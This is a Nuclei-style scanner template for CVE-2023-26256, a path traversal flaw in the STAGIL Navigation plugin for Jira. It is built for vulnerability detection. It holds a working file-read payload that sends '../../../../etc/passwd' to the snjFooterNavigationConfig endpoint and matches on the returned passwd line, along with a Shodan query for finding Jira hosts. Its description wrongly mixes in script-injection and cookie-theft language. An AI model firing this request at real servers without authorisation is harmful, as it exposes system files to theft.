id: CVE-2023-26256

info:
  name: STAGIL Navigation for Jira Menu & Themes <2.0.52 - Local File Inclusion
  author: pikpikcu
  severity: high
  description: |
    STAGIL Navigation for Jira Menu & Themes plugin before 2.0.52 is susceptible to local file inclusion via modifying the fileName parameter to the snjFooterNavigationConfig endpoint. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can potentially allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  reference:
    - https://github.com/1nters3ct/CVEs/blob/main/CVE-2023-26256.md
    - https://marketplace.atlassian.com/apps/1216090/stagil-navigation-for-jira-menus-themes?tab=overview&hosting=cloud
    - https://nvd.nist.gov/vuln/detail/CVE-2023-26256
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-26256
    cwe-id: CWE-22
    epss-score: 0.01245
    cpe: cpe:2.3:a:stagil:stagil_navigation:*:*:*:*:*:jira:*:*
  metadata:
    max-request: 1
    shodan-query: title:Jira
    framework: jira
    vendor: stagil
    product: stagil_navigation
  tags: cve,cve2023,lfi,jira,cms,atlassian

http:
  - method: GET
    path:
      - "{{BaseURL}}/plugins/servlet/snjFooterNavigationConfig?fileName=../../../../etc/passwd&fileMime=$textMime"

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - '$textMime'

      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200